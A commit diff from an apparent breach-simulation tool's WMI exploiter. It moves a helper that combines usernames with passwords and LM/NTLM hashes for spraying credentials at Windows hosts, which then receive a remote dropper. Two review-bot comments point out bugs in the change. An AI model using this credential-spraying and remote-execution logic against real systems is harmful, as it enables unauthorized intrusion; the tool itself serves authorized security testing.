Agent: decouple wmiexec.py from WormConfig object

vakarisz 2022-03-08 14:56:22 +02:00
parent d7e222c8a8
commit c932a19b47
3 changed files with 29 additions and 20 deletions


@ -151,20 +151,6 @@ class Configuration(object):
""" """
return product(self.exploit_user_list, self.exploit_ssh_keys) return product(self.exploit_user_list, self.exploit_ssh_keys)
def get_exploit_user_password_or_hash_product(self):
"""
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
:return:
"""
cred_list = []
for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
cred_list.append(cred)
return cred_list
@staticmethod @staticmethod
def hash_sensitive_data(sensitive_data): def hash_sensitive_data(sensitive_data):
""" """


@ -52,6 +52,7 @@ class SmbExploiter(HostExploiter):
logger.info("Can't find suitable monkey executable for host %r", self.host) logger.info("Can't find suitable monkey executable for host %r", self.host)
return False return False
# TODO extract the method in wmiexec.py
creds = self._config.get_exploit_user_password_or_hash_product() creds = self._config.get_exploit_user_password_or_hash_product()
exploited = False exploited = False
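Review bot: The line under the new TODO still calls `self._config.get_exploit_user_password_or_hash_product()`, which this same commit deletes from `Configuration`. Unless `self._config` gets that method from somewhere not shown on this page, SmbExploiter will raise `AttributeError` as soon as it reaches this line. Either keep the `Configuration` method until this exploiter is migrated, or move the new helper into a shared module and call it here. The TODO is also ambiguous about what remains to be done; something like `# TODO: build creds with the helper extracted into wmiexec.py instead of self._config` would say it. The enclosing method starts and ends outside the hunk.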


@ -2,13 +2,14 @@ import logging
import ntpath import ntpath
import socket import socket
import traceback import traceback
from typing import List from itertools import product
from typing import List, Mapping
from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPCException
from common.utils.exploit_enum import ExploitType from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey from infection_monkey.exploit.tools.helpers import get_monkey_depth
from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
@ -28,7 +29,7 @@ class WmiExploiter(HostExploiter):
@WmiTools.dcom_wrap @WmiTools.dcom_wrap
def _exploit_host(self): def _exploit_host(self):
creds = self._config.get_exploit_user_password_or_hash_product() creds = _get_exploit_user_password_or_hash_product(self.options["credentials"])
for user, password, lm_hash, ntlm_hash in creds: for user, password, lm_hash, ntlm_hash in creds:
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash]) creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
@ -83,20 +84,20 @@ class WmiExploiter(HostExploiter):
password, password,
lm_hash, lm_hash,
ntlm_hash, ntlm_hash,
self._config.smb_download_timeout, self.options["smb_download_timeout"],
) )
if not remote_full_path: if not remote_full_path:
wmi_connection.close() wmi_connection.close()
return False return False
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:
cmdline = DROPPER_CMDLINE_WINDOWS % { cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path "dropper_path": remote_full_path
} + build_monkey_commandline( } + build_monkey_commandline(
self.host, self.host,
get_monkey_depth() - 1, get_monkey_depth() - 1,
self._config.dropper_target_path_win_32, self.options["dropper_target_path_win_64"],
) )
else: else:
cmdline = MONKEY_CMDLINE_WINDOWS % { cmdline = MONKEY_CMDLINE_WINDOWS % {
@ -139,6 +140,27 @@ class WmiExploiter(HostExploiter):
return False return False
def _get_exploit_user_password_or_hash_product(credentials: Mapping) -> List:
"""
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
:return:
"""
cred_list = []
for cred in product(
credentials["exploit_user_list"], credentials["exploit_password_list"], [""], [""]
):
cred_list.append(cred)
for cred in product(
credentials["exploit_user_list"], [""], [""], credentials["exploit_ntlm_hash_list"]
):
cred_list.append(cred)
for cred in product(
credentials["exploit_user_list"], [""], credentials["exploit_lm_hash_list"], [""]
):
cred_list.append(cred)
return cred_list
def _get_credential_string(creds: List) -> str: def _get_credential_string(creds: List) -> str:
cred_strs = [ cred_strs = [
(creds[0], "username"), (creds[0], "username"),
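Review bot: In the `@ -83,20 +84,20 @` hunk the rewritten `elif` lower-cases only `remote_full_path`, where the old comparison also called `.lower()` on the configured path. If the configured dropper path contains any upper-case character, the two sides can never be equal, so the dropper branch is always taken even when the file already sits at its final path. Restore the case-insensitive comparison with `elif remote_full_path.lower() != self.options["dropper_target_path_win_64"].lower():`. The same lines switch from `dropper_target_path_win_32` to `dropper_target_path_win_64`, both here and in the `build_monkey_commandline` call; please confirm that is intended, since the commit title describes only a decoupling. `_exploit_host` starts and ends outside this hunk.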